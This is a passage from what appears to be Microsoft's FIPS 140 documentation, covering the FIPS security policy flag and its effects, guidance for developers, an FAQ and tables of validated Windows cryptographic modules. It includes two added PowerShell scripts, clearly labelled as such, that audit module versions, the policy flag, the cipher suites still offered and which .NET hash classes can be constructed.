be accomplished by cross-checking the version number of the installed module with the list of validated binaries.
The list of validated CAPI binaries is identified in the CAPI Validated Cryptographic Modules section below and the
list of validated CNG binaries is identified in the CNG Validated Cryptographic Modules section below. There are
similar sections for all other validated cryptographic modules.
The version number of the installed binary is found by right-clicking the module file and clicking on the Version or
Details tab. Cryptographic modules are stored in the "windows\system32" or "windows\system32\drivers"
directory.
Step 2 – Setting FIPS Local/Group Security Policy Flag
The Windows operating system provides a group (or local) security policy setting, “System cryptography: Use FIPS
compliant algorithms for encryption, hashing, and signing”, which is used by many Microsoft products to
determine whether to operate in a FIPS-approved mode. When this policy is set, the validated cryptographic
modules in Windows will also operate in a FIPS-approved mode.
Note – There is no enforcement of the FIPS policy by the operating system or the validated cryptographic
modules. Instead, each individual application must check this flag and enforce the Security Policy of the validated
cryptographic modules.
Instructions on Setting the FIPS Local/Group Security Policy Flag
While there are alternative methods for setting the FIPS local/group security policy flag, the following method is
included as a guide to users with Administrative privileges. This description is for the Local Security Policy, but the
Group Security Policy may be set in a similar manner.
1. Open the 'Run' menu by pressing the combination 'Windows Key + R'.
2. Type 'secpol.msc' and press 'Enter' or click the 'Ok' button.
3. In the Local Security Policy management console window that opens, use the left pane to navigate to Local
Policies -> Security Options.
4. Scroll down the right pane and double-click 'System cryptography: Use FIPS compliant algorithms for
encryption, hashing, and signing'.
5. In the properties window, select the 'Enabled' option and click the 'Apply' button.
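Both steps, the module inventory for Step 1 and the policy flag for Step 2, from Windows PowerShell. This is an added example that is not part of the original page. The module file names are the ones that appear on Microsoft's validation certificates and are listed here as assumptions; compare the versions you get against the validated-module sections below. The registry value is the one the policy setting writes; the page itself refers only to secpol.msc, so treat the key path as an assumption and confirm it on your own build by toggling the setting and re-reading the value.

```powershell
# Added example (not from the page): Step 1 and Step 2 from Windows PowerShell.
# Module file names and the registry key path are assumptions; see the lead-in.

# --- Step 1: inventory the installed cryptographic module binaries -------------
$system32 = Join-Path $env:SystemRoot 'System32'
$modules = @(
    'bcryptprimitives.dll',  # Cryptographic Primitives Library (CNG, user mode)
    'drivers\cng.sys',       # Kernel Mode Cryptographic Primitives Library (CNG)
    'rsaenh.dll',            # Enhanced Cryptographic Provider (legacy CAPI)
    'dssenh.dll',            # Enhanced DSS and Diffie-Hellman Provider (legacy CAPI)
    'drivers\ksecdd.sys',    # Kernel Security Support Provider Interface
    'ci.dll'                 # Code Integrity
)
$inventory = foreach ($m in $modules) {
    $path = Join-Path $system32 $m
    if (Test-Path -LiteralPath $path) {
        $vi = (Get-Item -LiteralPath $path).VersionInfo
        [pscustomobject]@{ Module = $m; FileVersion = $vi.FileVersion; ProductVersion = $vi.ProductVersion }
    } else {
        [pscustomobject]@{ Module = $m; FileVersion = '(not present)'; ProductVersion = '' }
    }
}
$inventory | Format-Table -AutoSize
# Cross-check each FileVersion against the version on the module's validation
# certificate. A version that is not on a certificate is not a validated module,
# whatever the policy flag below says.

# --- Step 2: read and (optionally) set the FIPS policy flag --------------------
# This DWORD is what 'System cryptography: Use FIPS compliant algorithms for
# encryption, hashing, and signing' toggles in secpol.msc (assumption; verify on
# your build by flipping the setting and re-reading the value).
$key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy'
$enabled = (Get-ItemProperty -Path $key -Name Enabled -ErrorAction SilentlyContinue).Enabled
Write-Host ("FIPS policy flag is currently {0}" -f $(if ($enabled -eq 1) { 'Enabled' } else { 'Disabled' }))

# To enable it (needs an elevated prompt), uncomment the next line. The OS does
# not enforce the flag; each component reads it on its own schedule, so reboot
# afterwards rather than assuming already running services picked it up.
# Set-ItemProperty -Path $key -Name Enabled -Value 1 -Type DWord
```

Reading the registry and file versions needs no elevation, so the script can be run as-is on a machine you are auditing; only the commented Set-ItemProperty line changes state.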
Microsoft Components and Products That Utilize FIPS Local/Group Security Policy
The following list details some of the Microsoft components that use the cryptographic functionality implemented
by either CNG or legacy CAPI. When the FIPS Local/Group Security Policy is set, the following components will
enforce the validated module Security Policy.
Schannel Security Package
Remote Desktop Protocol (RDP) Client
Encrypting File System (EFS)
Some Microsoft .NET Framework Applications (.NET also provides cryptographic algorithm implementations
that have not been FIPS 140 validated.)
BitLocker® Drive Full-volume Encryption
IPsec Settings of Windows Firewall
Effects of Setting FIPS Local/Group Security Policy Flag
When the FIPS local/group security policy flag is set, the behavior of several Microsoft components and products
is affected. The most noticeable difference is that the components enforcing this setting will only use those
algorithms approved or allowed in FIPS mode. The specific changes to the products listed above are:
The Schannel Security Package is forced to negotiate sessions using TLS rather than SSL. The following otherwise
supported cipher suites are disabled:
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
SSL_CK_RC4_128_WITH_MD5
SSL_CK_DES_192_EDE3_CBC_WITH_MD5
TLS_RSA_WITH_NULL_MD5
TLS_RSA_WITH_NULL_SHA
The set of cryptographic algorithms that a Remote Desktop Protocol (RDP) server will use is scoped to:
CALG_RSA_KEYX - RSA public key exchange algorithm
CALG_3DES - Triple DES encryption algorithm
CALG_AES_128 - 128-bit AES
CALG_AES_256 - 256-bit AES
CALG_SHA1 - SHA-1 hashing algorithm
CALG_SHA_256 - SHA-256 hashing algorithm
CALG_SHA_384 - SHA-384 hashing algorithm
CALG_SHA_512 - SHA-512 hashing algorithm
Any Microsoft .NET Framework applications, such as Microsoft ASP.NET or Windows Communication
Foundation (WCF), only allow algorithm implementations that are validated to FIPS 140, meaning only
classes whose names end in "CryptoServiceProvider" or "Cng" can be used. Any attempt to create an instance of
another cryptographic algorithm class, or to create an instance that uses a non-allowed algorithm, will cause an
InvalidOperationException.
Verification of ClickOnce applications fails unless the client computer has .NET Framework 2.0 SP1 or later
service pack installed or .NET Framework 3.5 or later installed.
On Windows Vista and Windows Server 2008 and later, BitLocker Drive Encryption switches from AES-128
using the Elephant diffuser to the approved AES-256 encryption. Recovery passwords are not created
or backed up. Instead, back up a recovery key on a local drive or on a network share. To use the recovery key,
put the key on a USB device and plug the device into the computer.
Please be aware that selection of FIPS mode can limit product functionality (See
http://support.microsoft.com/kb/811833).
Information for Software Developers
This section is targeted at developers who wish to build their own applications using the FIPS 140 validated
cryptographic modules.
Each of the validated cryptographic modules defines a series of rules that must be followed. The security rules for
each validated cryptographic module are specified in its Security Policy document. Links to each of the Security
Policy documents are provided in the Microsoft FIPS 140 Validated Cryptographic Modules section below.
Generally, the restriction imposed by the Microsoft validated cryptographic modules is to limit the use of cryptography
to FIPS Approved cryptographic algorithms, modes, and key sizes.
Using Microsoft Cryptographic Modules in a FIPS mode of operation
No matter whether developing with native languages or using .NET, it is important to first check whether the CNG
modules for the target system are FIPS validated. The list of validated CNG binaries is identified in the CNG
Validated Cryptographic Modules section.
When developing using CNG directly, it is the responsibility of the developer to follow the security rules outlined in
the FIPS 140 Security Policy for each module. The security policy for each module is provided on the CMVP
website, and links to each of the Security Policy documents are provided in the tables below. It is important to remember
that setting the FIPS local/group security policy flag (discussed above) does not affect the behavior of the modules
when they are used for developing custom applications.
If you are developing your application using .NET instead of the native libraries, then setting the FIPS local
policy flag will generate an exception when an improper .NET class is used for cryptography (i.e. the cryptographic
classes whose names end in "Managed"). The names of the allowed classes end with "Cng" (these use the CNG
binaries) or "CryptoServiceProvider" (these use the legacy CAPI binaries).
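Two of the effects described above (the Schannel cipher suites that the flag disables, and the .NET classes that stop constructing) can be checked on a running machine. The following Windows PowerShell script is an added example and is not code from this Microsoft page; it assumes Windows PowerShell 5.1 on .NET Framework and a Windows version that ships Get-TlsCipherSuite (Windows 8.1 / Server 2012 R2 and later), and the function names Get-FipsPolicyState, Test-DisabledCipherSuites and Test-HashClassUnderFipsPolicy are the example's own.

```powershell
# Added example (not from the Microsoft page). Audits two effects of the
# "Use FIPS compliant algorithms" local/group security policy flag on this machine:
# which of the cipher suites listed above Schannel still offers, and which .NET
# hash classes can be constructed. Assumes Windows PowerShell 5.1 (.NET Framework).

# The six suites the page says Schannel disables in FIPS mode.
$FipsDisabledSuites = @(
    'TLS_RSA_WITH_RC4_128_SHA',
    'TLS_RSA_WITH_RC4_128_MD5',
    'SSL_CK_RC4_128_WITH_MD5',
    'SSL_CK_DES_192_EDE3_CBC_WITH_MD5',
    'TLS_RSA_WITH_NULL_MD5',
    'TLS_RSA_WITH_NULL_SHA'
)

function Get-FipsPolicyState {
    # On .NET Framework this property mirrors the FIPS local/group security policy flag.
    [System.Security.Cryptography.CryptoConfig]::AllowOnlyFipsAlgorithms
}

function Test-DisabledCipherSuites {
    # One object per suite, recording whether Schannel currently still offers it.
    $offered = Get-TlsCipherSuite | Select-Object -ExpandProperty Name
    foreach ($suite in $FipsDisabledSuites) {
        [pscustomobject]@{
            Suite        = $suite
            StillOffered = ($offered -contains $suite)
        }
    }
}

function Test-HashClassUnderFipsPolicy {
    # Tries to construct a .NET hash class by type name. With the flag set, the
    # "Managed" classes throw InvalidOperationException from their constructor;
    # the "Cng" and "CryptoServiceProvider" classes construct and hash normally.
    param([Parameter(Mandatory)][string]$TypeName)
    $probe = [pscustomobject]@{ TypeName = $TypeName; Constructed = $false; Digest = $null; Error = $null }
    try {
        $algo  = New-Object -TypeName $TypeName
        $bytes = [System.Text.Encoding]::ASCII.GetBytes('constructed sample input')   # constructed input
        $probe.Digest      = [System.BitConverter]::ToString($algo.ComputeHash($bytes)).Replace('-', '')
        $probe.Constructed = $true
        $algo.Dispose()
    } catch {
        # New-Object wraps the constructor's exception; GetBaseException() unwraps it.
        $probe.Error = $_.Exception.GetBaseException().GetType().Name
    }
    $probe
}

"FIPS policy flag enabled (CryptoConfig.AllowOnlyFipsAlgorithms): $(Get-FipsPolicyState)"
Test-DisabledCipherSuites | Format-Table -AutoSize
@(
    'System.Security.Cryptography.SHA256Managed',
    'System.Security.Cryptography.SHA256CryptoServiceProvider',
    'System.Security.Cryptography.SHA256Cng'
) | ForEach-Object { Test-HashClassUnderFipsPolicy -TypeName $_ } | Format-Table -AutoSize
```

The SSL_CK_* entries are SSL 2.0 suites and do not appear in Get-TlsCipherSuite output on current Windows whatever the flag's state, so StillOffered = False for those two rows is not evidence that the flag is set; rely on the TLS_* rows and the .NET probe for that.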
Key Strengths and Validity Periods
NIST Special Publication 800-131A Revision 1, Transitions: Recommendation for Transitioning the Use of
Cryptographic Algorithms and Key Lengths, dated November 2015, [SP 800-131A], offers guidance for moving to
stronger cryptographic keys and algorithms. This does not replace NIST SP 800-57, Recommendation for Key
Management Part 1: General, [SP 800-57], but gives more specific guidance. One of the most important topics
discussed in these publications deals with the key strengths of FIPS Approved algorithms and their validity periods.
When developing applications that use FIPS Approved algorithms, it is also extremely important to select
appropriate key sizes based on the security lifetimes recommended by NIST.

FIPS 140 FAQ


The following are answers to commonly asked questions for the FIPS 140-2 validation of Microsoft products.
1. How does FIPS 140 relate to the Common Criteria?
Answer: These are two separate security standards with different, but complementary, purposes. FIPS 140 is a
standard designed specifically for validating product modules that implement cryptography. On the other hand,
Common Criteria is designed to help evaluate security functions in IT products.
In many cases, Common Criteria evaluations will rely on FIPS 140 validations to provide assurance that
cryptographic functionality is implemented properly.
2. How does FIPS 140 relate to Suite B?
Answer: Suite B is simply a set of cryptographic algorithms defined by the U.S. National Security Agency
(NSA) as part of its Cryptographic Modernization Program. The set of Suite B cryptographic algorithms are to
be used for both unclassified information and most classified information.
The Suite B cryptographic algorithms are a subset of the FIPS Approved cryptographic algorithms as allowed
by the FIPS 140 standard.
3. There are so many modules listed on the NIST website for each release, how are they related and how do I tell
which one applies to me?
Answer: Microsoft strives to validate all releases of its cryptographic modules. Each module provides a
different set of cryptographic algorithms. If you are required to use only FIPS validated cryptographic modules,
you simply need to verify that the version being used appears on the validation list.
Please see the Microsoft FIPS 140 Validated Cryptographic Modules section for a complete list of Microsoft
validated modules.
4. My application links against crypt32.dll, cryptsp.dll, advapi32.dll, bcrypt.dll, bcryptprimitives.dll, or ncrypt.dll.
What do I need to do to ensure I'm using FIPS 140 validated cryptographic modules?
Answer: crypt32.dll, cryptsp.dll, advapi32.dll, and ncrypt.dll are intermediary libraries that will offload all
cryptographic operations to the FIPS validated cryptographic modules. Bcrypt.dll itself is a validated
cryptographic module for Windows Vista and Windows Server 2008. For Windows 7 and Windows Server
2008 R2 and later, bcryptprimitives.dll is the validated module, but bcrypt.dll remains as one of the libraries to
link against.
You must first verify that the underlying CNG cryptographic module is validated. Once verified, you'll need to
confirm that you're using the module correctly in FIPS mode (See Information for Software Developers section
for details).
5. What does "When operated in FIPS mode" mean on certificates?
Answer: This caveat identifies that a required configuration and security rules must be followed in order to use
the cryptographic module in a manner consistent with its FIPS 140 Security Policy. The security rules are
defined in the Security Policy for the module and usually revolve around using only FIPS Approved
cryptographic algorithms and key sizes. Please see the Security Policy for the specific security rules for each
cryptographic module (See Microsoft FIPS 140 Validated Cryptographic Modules section for links to each
policy).
6. Which FIPS validated module is called when Windows 7 or Windows 8 is configured to use the FIPS setting in
the wireless configuration?
Answer: CNG is used. This setting tells the wireless driver to call FIPS 140-2 validated cryptographic modules
instead of using the driver’s own cryptography, if any.
7. Is BitLocker to Go FIPS 140-2 validated?
Answer: There are two separate parts for BitLocker to Go. One part is simply a native feature of BitLocker and
as such, it uses FIPS 140-2 validated cryptographic modules. The other part is the BitLocker to Go Reader
application for down-level support of older operating systems such as Windows XP and Windows Vista. The
Reader application does not use FIPS 140-2 validated cryptographic modules.
8. Are applications FIPS 140-2 validated?
Answer: Microsoft only has low-level cryptographic modules in Windows FIPS 140-2 validated, not high-level
applications. A better question is whether a certain application calls a FIPS 140-2 validated cryptographic
module in the underlying Windows OS. That question needs to be directed to the company/product group that
created the application of interest.
9. How can System Center Operations Manager 2012 be configured to use FIPS 140-2 validated cryptographic
modules?
Answer: See http://technet.microsoft.com/library/hh914094.aspx

Microsoft FIPS 140 Validated Cryptographic Modules


Modules By Operating System
The following tables identify the Cryptographic Modules for an operating system.
Windows
Windows 10 Creators Update (Version 1703)

Validated Editions: Home, Pro, Enterprise, Education, S, Surface Hub, Mobile

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) | 10.0.15063 | #3095
    FIPS Approved algorithms: AES (Cert. #4624); CKG (vendor affirmed); CVL (Certs. #1278 and #1281); DRBG (Cert. #1555); DSA (Cert. #1223); ECDSA (Cert. #1133); HMAC (Cert. #3061); KAS (Cert. #127); KBKDF (Cert. #140); KTS (AES Cert. #4626; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2521 and #2522); SHS (Cert. #3790); Triple-DES (Cert. #2459)
    Other algorithms: HMAC-MD5; MD5; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #1133); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #2521); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #1281); SP800-135 - Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS (Cert. #1278)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 10.0.15063 | #3094
    FIPS Approved algorithms: AES (Certs. #4624 and #4626); CKG (vendor affirmed); CVL (Certs. #1278 and #1281); DRBG (Cert. #1555); DSA (Cert. #1223); ECDSA (Cert. #1133); HMAC (Cert. #3061); KAS (Cert. #127); KBKDF (Cert. #140); KTS (AES Cert. #4626; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2521 and #2523); SHS (Cert. #3790); Triple-DES (Cert. #2459)
    Other algorithms: HMAC-MD5; MD5; NDRNG; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #1133); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #2521); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #1281)

Boot Manager | 10.0.15063 | #3089
    FIPS Approved algorithms: AES (Certs. #4624 and #4625); CKG (vendor affirmed); HMAC (Cert. #3061); PBKDF (vendor affirmed); RSA (Cert. #2523); SHS (Cert. #3790)
    Other algorithms: PBKDF (vendor affirmed); VMK KDF (vendor affirmed)

Windows OS Loader | 10.0.15063 | #3090
    FIPS Approved algorithms: AES (Certs. #4624 and #4625); RSA (Cert. #2523); SHS (Cert. #3790)
    Other algorithms: NDRNG

Windows Resume[1] | 10.0.15063 | #3091
    FIPS Approved algorithms: AES (Certs. #4624 and #4625); RSA (Cert. #2523); SHS (Cert. #3790)

BitLocker® Dump Filter[2] | 10.0.15063 | #3092
    FIPS Approved algorithms: AES (Certs. #4624 and #4625); RSA (Cert. #2522); SHS (Cert. #3790)

Code Integrity (ci.dll) | 10.0.15063 | #3093
    FIPS Approved algorithms: AES (Cert. #4624); RSA (Certs. #2522 and #2523); SHS (Cert. #3790)
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v1.5 - RSASP1 Signature Primitive (Cert. #1282)

Secure Kernel Code Integrity (skci.dll)[3] | 10.0.15063 | #3096
    FIPS Approved algorithms: AES (Cert. #4624); RSA (Certs. #2522 and #2523); SHS (Cert. #3790)
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v1.5 - RSASP1 Signature Primitive (Cert. #1282)

[1] Applies only to Home, Pro, Enterprise, Education and S
[2] Applies only to Pro, Enterprise, Education, S, Mobile and Surface Hub
[3] Applies only to Pro, Enterprise, Education and S
Windows 10 Anniversary Update (Version 1607)

Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) | 10.0.14393 | #2937
    FIPS Approved algorithms: AES (Cert. #4064); DRBG (Cert. #1217); DSA (Cert. #1098); ECDSA (Cert. #911); HMAC (Cert. #2651); KAS (Cert. #92); KBKDF (Cert. #101); KTS (AES Cert. #4062; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2192, #2193 and #2195); SHS (Cert. #3347); Triple-DES (Cert. #2227)
    Other algorithms: HMAC-MD5; MD5; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #922); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #888); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #887); SP800-135 - Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS (Cert. #886)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 10.0.14393 | #2936
    FIPS Approved algorithms: AES (Cert. #4064); DRBG (Cert. #1217); DSA (Cert. #1098); ECDSA (Cert. #911); HMAC (Cert. #2651); KAS (Cert. #92); KBKDF (Cert. #101); KTS (AES Cert. #4062; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #2192, #2193 and #2195); SHS (Cert. #3347); Triple-DES (Cert. #2227)
    Other algorithms: HMAC-MD5; MD5; NDRNG; DES; Legacy CAPI KDF; MD2; MD4; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #922); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #888); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #887)

Boot Manager | 10.0.14393 | #2931
    FIPS Approved algorithms: AES (Certs. #4061 and #4064); HMAC (Cert. #2651); PBKDF (vendor affirmed); RSA (Cert. #2193); SHS (Cert. #3347)
    Other algorithms: MD5; PBKDF (non-compliant); VMK KDF

BitLocker® Windows OS Loader (winload) | 10.0.14393 | #2932
    FIPS Approved algorithms: AES (Certs. #4061 and #4064); RSA (Cert. #2193); SHS (Cert. #3347)
    Other algorithms: NDRNG; MD5

BitLocker® Windows Resume (winresume)[1] | 10.0.14393 | #2933
    FIPS Approved algorithms: AES (Certs. #4061 and #4064); RSA (Cert. #2193); SHS (Cert. #3347)
    Other algorithms: MD5

BitLocker® Dump Filter (dumpfve.sys)[2] | 10.0.14393 | #2934
    FIPS Approved algorithms: AES (Certs. #4061 and #4064)

Code Integrity (ci.dll) | 10.0.14393 | #2935
    FIPS Approved algorithms: RSA (Cert. #2193); SHS (Cert. #3347)
    Other algorithms: AES (non-compliant); MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #888)

Secure Kernel Code Integrity (skci.dll)[3] | 10.0.14393 | #2938
    FIPS Approved algorithms: RSA (Certs. #2193); SHS (Certs. #3347)
    Other algorithms: MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #888)

[1] Applies only to Home, Pro, Enterprise and Enterprise LTSB
[2] Applies only to Pro, Enterprise, Enterprise LTSB and Mobile
[3] Applies only to Pro, Enterprise and Enterprise LTSB
Windows 10 November 2015 Update (Version 1511)

Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile, Surface Hub

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) | 10.0.10586 | #2606
    FIPS Approved algorithms: AES (Certs. #3629); DRBG (Certs. #955); DSA (Certs. #1024); ECDSA (Certs. #760); HMAC (Certs. #2381); KAS (Certs. #72; key agreement; key establishment methodology provides between 112 and 256 bits of encryption strength); KBKDF (Certs. #72); KTS (AES Certs. #3653; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #1887, #1888 and #1889); SHS (Certs. #3047); Triple-DES (Certs. #2024)
    Other algorithms: DES; HMAC-MD5; Legacy CAPI KDF; MD2; MD4; MD5; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #666); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #665); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #663); SP800-135 - Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS (Cert. #664)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 10.0.10586 | #2605
    FIPS Approved algorithms: AES (Certs. #3629); DRBG (Certs. #955); DSA (Certs. #1024); ECDSA (Certs. #760); HMAC (Certs. #2381); KAS (Certs. #72; key agreement; key establishment methodology provides between 112 and 256 bits of encryption strength); KBKDF (Certs. #72); KTS (AES Certs. #3653; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #1887, #1888 and #1889); SHS (Certs. #3047); Triple-DES (Certs. #2024)
    Other algorithms: DES; HMAC-MD5; Legacy CAPI KDF; MD2; MD4; MD5; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 ECDSA - Signature Generation of hash sized messages (Cert. #666); FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #665); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #663)

Boot Manager[4] | 10.0.10586 | #2700
    FIPS Approved algorithms: AES (Certs. #3653); HMAC (Cert. #2381); PBKDF (vendor affirmed); RSA (Cert. #1871); SHS (Certs. #3047 and #3048)
    Other algorithms: MD5; KDF (non-compliant); PBKDF (non-compliant)

BitLocker® Windows OS Loader (winload)[5] | 10.0.10586 | #2701
    FIPS Approved algorithms: AES (Certs. #3629 and #3653); RSA (Cert. #1871); SHS (Cert. #3048)
    Other algorithms: MD5; NDRNG

BitLocker® Windows Resume (winresume)[6] | 10.0.10586 | #2702
    FIPS Approved algorithms: AES (Certs. #3653); RSA (Cert. #1871); SHS (Cert. #3048)
    Other algorithms: MD5

BitLocker® Dump Filter (dumpfve.sys)[7] | 10.0.10586 | #2703
    FIPS Approved algorithms: AES (Certs. #3653)

Code Integrity (ci.dll) | 10.0.10586 | #2604
    FIPS Approved algorithms: RSA (Certs. #1871); SHS (Certs. #3048)
    Other algorithms: AES (non-compliant); MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #665)

Secure Kernel Code Integrity (skci.dll)[8] | 10.0.10586 | #2607
    FIPS Approved algorithms: RSA (Certs. #1871); SHS (Certs. #3048)
    Other algorithms: MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #665)

[4] Applies only to Home, Pro, Enterprise, Mobile and Surface Hub
[5] Applies only to Home, Pro, Enterprise, Mobile and Surface Hub
[6] Applies only to Home, Pro and Enterprise
[7] Applies only to Pro, Enterprise, Mobile and Surface Hub
[8] Applies only to Enterprise and Enterprise LTSB
Windows 10 (Version 1507)

Validated Editions: Home, Pro, Enterprise, Enterprise LTSB, Mobile, and Surface Hub

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) | 10.0.10240 | #2606
    FIPS Approved algorithms: AES (Certs. #3497); DRBG (Certs. #868); DSA (Certs. #983); ECDSA (Certs. #706); HMAC (Certs. #2233); KAS (Certs. #64; key agreement; key establishment methodology provides between 112 and 256 bits of encryption strength); KBKDF (Certs. #66); KTS (AES Certs. #3507; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #1783, #1798, and #1802); SHS (Certs. #2886); Triple-DES (Certs. #1969)
    Other algorithms: DES; HMAC-MD5; Legacy CAPI KDF; MD2; MD4; MD5; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #572); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #576); SP800-135 - Section 4.1.1, IKEv1 Section 4.1.2, IKEv2 Section 4.2, TLS (Cert. #575)

Kernel Mode Cryptographic Primitives Library (cng.sys) | 10.0.10240 | #2605
    FIPS Approved algorithms: AES (Certs. #3497); DRBG (Certs. #868); DSA (Certs. #983); ECDSA (Certs. #706); HMAC (Certs. #2233); KAS (Certs. #64; key agreement; key establishment methodology provides between 112 and 256 bits of encryption strength); KBKDF (Certs. #66); KTS (AES Certs. #3507; key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); PBKDF (vendor affirmed); RSA (Certs. #1783, #1798, and #1802); SHS (Certs. #2886); Triple-DES (Certs. #1969)
    Other algorithms: DES; HMAC-MD5; Legacy CAPI KDF; MD2; MD4; MD5; RC2; RC4; RSA (encrypt/decrypt)
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #572); FIPS186-4 RSA; RSADP - RSADP Primitive (Cert. #576)

Boot Manager[9] | 10.0.10240 | #2600
    FIPS Approved algorithms: AES (Cert. #3497); HMAC (Cert. #2233); KTS (AES Cert. #3498); PBKDF (vendor affirmed); RSA (Cert. #1784); SHS (Certs. #2871 and #2886)
    Other algorithms: MD5; KDF (non-compliant); PBKDF (non-compliant)

BitLocker® Windows OS Loader (winload)[10] | 10.0.10240 | #2601
    FIPS Approved algorithms: AES (Certs. #3497 and #3498); RSA (Cert. #1784); SHS (Cert. #2871)
    Other algorithms: MD5; NDRNG

BitLocker® Windows Resume (winresume)[11] | 10.0.10240 | #2602
    FIPS Approved algorithms: AES (Certs. #3497 and #3498); RSA (Cert. #1784); SHS (Cert. #2871)
    Other algorithms: MD5

BitLocker® Dump Filter (dumpfve.sys)[12] | 10.0.10240 | #2603
    FIPS Approved algorithms: AES (Certs. #3497 and #3498)

Code Integrity (ci.dll) | 10.0.10240 | #2604
    FIPS Approved algorithms: RSA (Certs. #1784); SHS (Certs. #2871)
    Other algorithms: AES (non-compliant); MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #572)

Secure Kernel Code Integrity (skci.dll)[13] | 10.0.10240 | #2607
    FIPS Approved algorithms: RSA (Certs. #1784); SHS (Certs. #2871)
    Other algorithms: MD5
    Validated Component Implementations: FIPS186-4 RSA; PKCS#1 v2.1 - RSASP1 Signature Primitive (Cert. #572)

[9] Applies only to Home, Pro, Enterprise and Enterprise LTSB
[10] Applies only to Home, Pro, Enterprise and Enterprise LTSB
[11] Applies only to Home, Pro, Enterprise and Enterprise LTSB
[12] Applies only to Pro, Enterprise and Enterprise LTSB
[13] Applies only to Enterprise and Enterprise LTSB
Windows 8.1

Validated Editions: RT, Pro, Enterprise, Phone, Embedded

Cryptographic Module | Version (link to Security Policy) | FIPS Certificate # | Algorithms

Cryptographic Primitives Library (bcryptprimitives.dll and ncryptsslp.dll) | 6.3.9600, 6.3.9600.17031 | #2357
    FIPS Approved algorithms: AES (Cert. #2832); DRBG (Certs. #489); DSA (Cert. #855); ECDSA (Cert. #505); HMAC (Cert. #1773); KAS (Cert. #47); KBKDF (Cert. #30); PBKDF (vendor affirmed); RSA (Certs. #1487, #1493 and #1519); SHS (Cert. #2373); Triple-DES (Cert. #1692)
    Other algorithms: AES (Cert. #2832, key wrapping; key establishment methodology provides between 128 and 256 bits of encryption strength); AES-GCM encryption (non-compliant); DES; HMAC MD5; Legacy CAPI KDF; MD2; MD4; MD5; NDRNG; RC2; RC4; RSA (encrypt/decrypt)
